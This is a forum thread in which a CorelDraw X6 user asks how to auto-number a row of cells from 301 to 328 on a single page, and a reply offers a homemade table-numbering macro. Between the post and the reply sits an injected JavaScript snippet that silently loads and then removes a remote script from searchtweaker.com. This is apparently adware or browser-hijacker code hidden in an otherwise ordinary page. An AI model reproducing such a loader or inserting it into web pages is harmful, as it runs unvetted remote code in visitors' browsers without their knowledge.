Any Faster Way to Auto-Numbering Columns & Rows on One page Only?

Hi Guys!
I was wondering if someone knows any good and a FASTER way to Auto-Numbering columns and rows in CorelDrawX6, instead of typing them manually one by one?

For example, as on the picture i have attached, I would like to write Sequences of increasing Numbers from 301 to 328 in a row, only on one page. I Don't want to Number Pages. I am not refering to "Print Merge".

Is there any Automated method to do that, or any Free Macros, like those two commercials here?
JH Gimmie Numbers 2.0
and
Print Merge Application

Thank you and i Appreciate everyone's help.

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();

Parents
  • Hi CorelX,

are you working with a "table" in CorelDraw or did you just create a table-like graphic with lines/rectangles, etc.? The reason I ask is because I made a macro ages ago which can auto-number cells in columns in a table and start from any number you like. The macro works as shown in the video attachment below:

Reply Children